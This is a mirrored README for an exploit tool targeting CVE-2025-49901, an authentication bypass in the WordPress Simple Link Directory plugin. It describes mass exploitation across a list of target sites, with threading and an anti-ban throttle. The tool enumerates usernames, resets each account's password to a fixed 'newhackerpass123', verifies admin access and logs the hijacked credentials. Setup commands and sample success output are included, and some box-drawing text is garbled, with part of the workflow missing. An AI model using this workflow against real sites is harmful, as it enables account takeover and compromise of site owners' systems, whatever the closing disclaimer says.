Share
## https://sploitus.com/exploit?id=7733F16C-88C9-5C89-A8E3-D3DFC794B20E
# CVE-2025-49901
WordPress Simple Link Directory Plugin < 14.8.1 is vulnerable to a high priority Broken Authentication
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2025-49901 ยท Simple Link Directory ยท qc-opd โ
โ Authentication Bypass โ Password Reset โ RCE โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
---
## โธ Vulnerability
| | |
|---|---|
| **CVE** | CVE-2025-49901 |
| **CVSS** | **9.8 CRITICAL** โ `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **ADP** | CISA-ADP |
| **Plugin** | quantumcloud Simple Link Directory (`qc-simple-link-directory`) |
| **Affected** | All versions ** โ
โ pass=newhackerpass123 โ
โ _wpnonce= โ
โ โ
โ 5. Verify access (dual mode) โ
โ Session mode โ cookie check + /wp-admin/ probes โ
โ Password mode โ wp-login.php + admin panel check โ
โ โ
โ 6. Write confirmed hits โ scan_results/reset_mass_success.txt โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
---
## โธ Setup
```bash
git clone https://github.com/Nxploited/CVE-2025-49901.git
cd CVE-2025-49901
pip install requests colorama urllib3
python3 CVE-2025-49901.py
```
**`requirements.txt`**
```
requests>=2.28.0
colorama>=0.4.6
urllib3>=1.26.0
```
---
## โธ Usage
```
Targets list file โ list.txt (one host per line)
Threads โ default 5
HTTP timeout โ default 10s
Per-user delay MIN/MAX โ anti-ban throttle (default 0.3 / 0.7s)
Delay between sites โ default 1.0s
Output file โ scan_results/reset_mass_success.txt
```
**Targets format:**
```
https://target1.com
target2.com
http://target3.com/wordpress
```
**Fixed password injected for all resets:**
```
newhackerpass123
```
---
## โธ Username Enumeration Sources
| Method | Endpoint |
|---|---|
| Author redirect | `/?author=1` โ `/?author=10` |
| REST API | `/wp-json/wp/v2/users` |
| Hostname | First label of domain as fallback |
| Hardcoded | `admin` always included |
---
## โธ Admin Verification Logic
After each reset attempt the tool verifies access using **two independent methods**:
```
Session mode โ checks wordpress_logged_in cookie + /wp-admin/ indicators
Password mode โ full wp-login.php POST + multi-path admin panel probe
```
Admin indicators checked:
```
id="adminmenu" ยท id="wpadminbar" ยท id="wpwrap"
users.php ยท plugins.php ยท plugin-install-tab ยท upload-plugin
```
---
## โธ Terminal Output Format
```
[HH:MM:SS] [https://target.com] NONCE: OK | RESET: OK | ACCESS: 1 HIT
[HH:MM:SS] [https://target2.com] NONCE: FAIL | RESET: - | ACCESS: 0 HIT
```
---
## โธ Output File
**`scan_results/reset_mass_success.txt`**
```
[2025-06-01T14:22:10] https://target.com - account=admin pass=newhackerpass123 mode=password
[2025-06-01T14:22:18] https://target.com - account=editor pass=newhackerpass123 mode=session
```
---
## โธ Author
```
Nxploited (Khaled Alenazi)
GitHub โ https://github.com/Nxploited
Telegram โ @KNxploited
```
[](https://github.com/Nxploited)
[](https://t.me/KNxploited)
---
## โธ Disclaimer
```
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.
The author bears no responsibility for use against systems
the operator does not own or have explicit written permission to test.
Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.
```
---
ยฉ 2025 Nxploited ยท Simple Link Directory